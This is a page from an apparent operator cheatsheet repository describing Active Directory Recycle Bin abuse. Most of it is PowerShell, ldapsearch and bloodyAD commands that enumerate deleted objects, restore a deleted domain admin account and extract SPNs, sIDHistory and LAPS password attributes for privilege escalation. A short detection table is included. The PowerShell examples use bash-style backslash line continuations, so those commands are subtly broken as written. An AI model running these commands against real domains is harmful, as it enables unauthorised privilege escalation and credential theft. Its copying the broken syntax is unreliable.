daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-78-ad-recycle-bin-object-abuse.md (4623B)


      1 ---
      2 title: "Attack #78 โ€” AD Recycle Bin Object Abuse"
      3 description: "When the AD Recycle Bin feature is enabled (Server 2008 R2+), deleted AD objects are moved to the CN=Deleted Objects container and retained for aโ€ฆ"
      4 category: active-directory
      5 subcategory: "Advanced & Post-Exploitation"
      6 tags: ["active-directory", "privilege-escalation"]
      7 tools: ["NetExec", "ldapsearch", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/๐Ÿ”ท Attack #78 โ€” AD Recycle Bin Object Abuse.md"
     11 ---
     12 # ๐Ÿ”ท Attack #78 โ€” AD Recycle Bin Object Abuse
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 When the **AD Recycle Bin** feature is enabled (Server 2008 R2+), deleted AD objects are moved to the `CN=Deleted Objects` container and retained for a configurable period (default 180 days). These deleted objects **retain all their attributes** โ€” including passwords, SPNs, group memberships, and ACLs. An attacker can query the Recycle Bin to find recently deleted privileged accounts and either restore them or extract their sensitive attributes for exploitation.
     19 
     20 ***
     21 
     22 ## โš™๏ธ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **AD Recycle Bin enabled** | Domain/Forest functional level 2008 R2+ |
     27 | **Domain user** | Basic read access to Deleted Objects container |
     28 | **Or DA** | For object restoration |
     29 
     30 ***
     31 
     32 ## ๐Ÿ’ป Full Commands
     33 
     34 ```powershell
     35 # โ”€โ”€ Check if Recycle Bin is enabled โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     36 Get-ADOptionalFeature -Filter {Name -like "Recycle*"}
     37 
     38 # โ”€โ”€ Query deleted objects โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     39 Get-ADObject -SearchBase "CN=Deleted Objects,DC=corp,DC=local" \
     40   -IncludeDeletedObjects -Filter * -Properties *
     41 
     42 # โ”€โ”€ Find deleted privileged users โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     43 Get-ADObject -SearchBase "CN=Deleted Objects,DC=corp,DC=local" \
     44   -IncludeDeletedObjects -Filter {ObjectClass -eq "user" -and adminCount -eq 1} \
     45   -Properties sAMAccountName,memberOf,adminCount,whenChanged
     46 
     47 # โ”€โ”€ Restore a deleted DA account โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     48 Restore-ADObject -Identity "<deleted_object_DN>" -NewName "restored_admin"
     49 
     50 # โ”€โ”€ Extract attributes from deleted objects โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     51 Get-ADObject -SearchBase "CN=Deleted Objects,DC=corp,DC=local" \
     52   -IncludeDeletedObjects -Filter {sAMAccountName -eq "old_svc_account"} \
     53   -Properties servicePrincipalName,sIDHistory,ms-Mcs-AdmPwd
     54 ```
     55 
     56 ```bash
     57 # โ”€โ”€ ldapsearch โ€” query Deleted Objects โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     58 ldapsearch -x -H ldap://DC01.corp.local -D "low_user@corp.local" -w 'Password1' \
     59   -b "CN=Deleted Objects,DC=corp,DC=local" \
     60   -s sub "(objectClass=user)" -E '!1.2.840.113556.1.4.417=::MAA='
     61 
     62 # โ”€โ”€ NetExec / bloodyAD โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     63 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
     64   get children "CN=Deleted Objects,DC=corp,DC=local" --type user
     65 ```
     66 
     67 ***
     68 
     69 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     70 
     71 | Event ID | Source | What to Look For |
     72 |---|---|---|
     73 | **4662** | Security Log (DC) | Access to Deleted Objects container |
     74 | **4741** | Security Log (DC) | Restored computer account |
     75 | **4720** | Security Log (DC) | Restored user account |
     76 
     77 ***
     78 
     79 ## ๐Ÿ”— Attack Chain Context
     80 
     81 ```
     82 [AD Recycle Bin] โ”€โ”€โ†’ Recover deleted privileged objects / extract sensitive attributes
     83          โ”‚
     84          โ”œโ”€โ”€โ†’ ๐Ÿ—‘๏ธ Deleted objects retain: passwords, SPNs, group memberships, LAPS
     85          โ”œโ”€โ”€โ†’ ๐Ÿ”— Restore deleted DA account โ†’ instant privilege escalation
     86          โ”œโ”€โ”€โ†’ ๐Ÿ“‹ Default retention: 180 days
     87          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: monitor Deleted Objects access, purge sensitive objects properly
     88 ```
     89 
     90 ***
     91 
     92 > โœ… **Attack #78 โ€” AD Recycle Bin Object Abuse complete.**
     93 
     94 ***
     95 
     96 > ๐Ÿ **Category 10 โ€” Misc / Modern Attacks is now COMPLETE (7/7 attacks).**
     97 
     98 ***
     99 
    100 > ๐Ÿ† **THE FULL 78-ATTACK AD CHEAT SHEET LIBRARY IS NOW COMPLETE.**